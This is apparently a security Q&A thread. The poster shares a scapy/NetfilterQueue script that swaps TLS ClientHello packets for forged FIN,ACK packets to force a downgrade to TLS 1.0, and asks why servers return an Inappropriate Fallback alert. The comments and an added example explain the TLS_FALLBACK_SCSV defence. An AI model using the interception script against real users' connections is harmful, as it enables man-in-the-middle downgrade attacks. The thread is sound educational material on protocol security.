
I know it won't work on every server, because some don't allow SSLv3, but I tried many servers and my attack doesn't seem to work.

For now, I attempt to downgrade to TLS 1.0 (also recognized by the number 769 in the protocol).

I have a full MITM setup with the ability to intercept packets as I wish. Now I have a script filtering packets for me, so every time the victim (even though it's just my own personal device) tries to send a ClientHello I check the version of the conversation it is trying to initiate; if the number is bigger than 769 (TLS 1.0) I send a FIN, ACK message in the name of the server.

Now the client attempts to connect again, but this time with a lower version, and so on, until reaching TLS 1.0 (769); then I accept the packet and let the connection go on.

The problem is that the server sends Alert (Level: Fatal, Description: Inappropriate Fallback) in response. Does this have to do with the server not supporting TLSv1? Because I have a hard time believing any decent server these days doesn't support TLSv1.

Now, in the article I quoted, they show they downgraded Facebook. For some reason it doesn't work in my setup. Here is my setup (I am using libnfqueue and scapy):

import re
from netfilterqueue import NetfilterQueue
from scapy.all import IP, TCP, raw, load_layer
from scapy.layers.tls.handshake import TLSClientHello

load_layer("tls")  # bind the TLS dissector so spkt[TLSClientHello] is populated on port 443
TLS1_0 = 769  # 0x0301

def print_and_accept(pkt):
    spkt = IP(pkt.get_payload())

    # Handshake record (0x16), record version 3.1, 2-byte length, handshake type ClientHello (0x01)
    if re.search(b'\x16\x03\x01.{2}\x01', raw(spkt), flags=re.DOTALL) and TLSClientHello in spkt:
        if spkt[TLSClientHello].version > TLS1_0: #tlsv1 - although should actually be sslv3, not tlsv1
            # Swap the ClientHello for a bare FIN, ACK; src/dst and ports are kept, so the
            # rewritten packet still flows client -> server with the client's own seq/ack
            new_packet = IP(dst=spkt[IP].dst, src=spkt[IP].src) / TCP(
                sport=spkt[TCP].sport, dport=spkt[TCP].dport,
                seq=spkt[TCP].seq, ack=spkt[TCP].ack, flags='FA')  # FIN, ACK
            pkt.set_payload(raw(new_packet))
    pkt.accept()

nfq = NetfilterQueue()
nfq.bind(1, print_and_accept)  # queue number must match the iptables NFQUEUE rule
nfq.run()
  • This might be your answer - http://security.stackexchange.com/a/81071/37973 – Peteris Nov 02 '16 at 15:04
  • @Peteris In which case, how does one perform a downgrade attack? – Zach P Nov 03 '16 at 08:52
  • 1
    As for almost any other attack - you perform it on those servers that are vulnerable to it due to their negligence, and you can't perform it on properly configured servers. If an article shows that they downgraded e.g. facebook, then it's not reasonable to assume that facebook is still vulnerable to it. – Peteris Nov 03 '16 at 13:34
  • @Peteris Are you certain? I'm having a hard time believing Facebook doesn't support SSLv3, nor does Google - even TLS. Because how can this fallback be so reliable? Why doesn't simply removing its trace from the cipher suites list work? – Zach P Nov 03 '16 at 14:03
  • 1
    Re-read the linked answer or https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-03 - even when retrying at TLSv1 or SSLv3 level, the client indicates in a particular field that it *can* support TLSv1.2, and the server can reject inappropriate fallback. The fix is 1.5 years old, all modern browsers should have that. – Peteris Nov 03 '16 at 15:42
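The "particular field" the comments refer to is the TLS_FALLBACK_SCSV signalling cipher suite (value 0x5600, RFC 7507): when a browser retries a handshake at a lower version because the first attempt died, it appends this pseudo-suite to ClientHello.cipher_suites, and a server whose highest supported version is above ClientHello.client_version answers with the fatal inappropriate_fallback alert (description 86) seen in the question. Since the ClientHello is part of the handshake transcript covered by the Finished messages, a MITM cannot quietly strip the value either. The following is an added example, not code from the question or the linked article: it builds minimal ClientHello records as constructed input, parses them, and applies the RFC 7507 server rule. The server's maximum version is a parameter, so the same function shows why a genuine TLS 1.0-only client is still served (no SCSV) and why a TLS 1.0-only server does not alert on an SCSV-bearing retry.

```python
import re
import struct

# Constants from RFC 7507 and the TLS record layer
TLS_FALLBACK_SCSV = 0x5600        # signalling cipher suite value
INAPPROPRIATE_FALLBACK = 86       # AlertDescription for a rejected fallback
TLS1_0, TLS1_1, TLS1_2 = 0x0301, 0x0302, 0x0303   # 769, 770, 771 in decimal


def build_client_hello(client_version, cipher_suites):
    """Constructed test input: a TLS record carrying a minimal ClientHello.

    The record-layer version is fixed at 3.1 (0x0301) as real browsers do; the
    version the question's script compares is ClientHello.client_version inside.
    """
    body = struct.pack("!H", client_version) + b"\x00" * 32      # client_version + random
    body += b"\x00"                                               # empty session_id
    body += struct.pack("!H", 2 * len(cipher_suites))
    body += b"".join(struct.pack("!H", cs) for cs in cipher_suites)
    body += b"\x01\x00"                                           # compression_methods: null
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body  # type 1, 3-byte length
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def looks_like_client_hello(record):
    """The byte pattern the question's nfqueue filter matches on (DOTALL so a length byte of 0x0a still matches)."""
    return re.search(b"\x16\x03\x01.{2}\x01", record, flags=re.DOTALL) is not None


def parse_client_hello(record):
    """Return (client_version, [cipher suites]) from a ClientHello record."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) != rec_len or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    hs_len = int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + hs_len]
    if len(body) != hs_len:
        raise ValueError("truncated ClientHello")
    client_version = struct.unpack("!H", body[:2])[0]
    pos = 2 + 32                                   # skip random
    sid_len = body[pos]
    pos += 1 + sid_len                             # skip session_id
    cs_len = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    suites = [struct.unpack("!H", body[pos + i:pos + i + 2])[0] for i in range(0, cs_len, 2)]
    return client_version, suites


def server_response(record, server_max_version=TLS1_2):
    """RFC 7507 server rule, server_max_version being an assumed deployment setting.

    SCSV present and client_version below the server's maximum => fatal alert;
    otherwise negotiate the lower of the two versions as a normal server would.
    """
    client_version, suites = parse_client_hello(record)
    if TLS_FALLBACK_SCSV in suites and client_version < server_max_version:
        return ("alert", INAPPROPRIATE_FALLBACK)
    return ("server_hello", min(client_version, server_max_version))


if __name__ == "__main__":
    suites = [0xC02F, 0xC030]   # two ordinary ECDHE AES-GCM suites
    cases = [
        ("first attempt at TLS 1.2, no SCSV", build_client_hello(TLS1_2, suites)),
        ("fallback retry at TLS 1.0 with SCSV", build_client_hello(TLS1_0, suites + [TLS_FALLBACK_SCSV])),
        ("genuine TLS 1.0-only client, no SCSV", build_client_hello(TLS1_0, suites)),
    ]
    for label, rec in cases:
        print(label, "->", server_response(rec))
```

Run against a server that only speaks TLS 1.0 (`server_max_version=TLS1_0`) the SCSV retry is accepted, which is why the alert in the question indicates a server that supports something newer than the version the forced retry asked for, not a server lacking TLSv1.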

0 Answers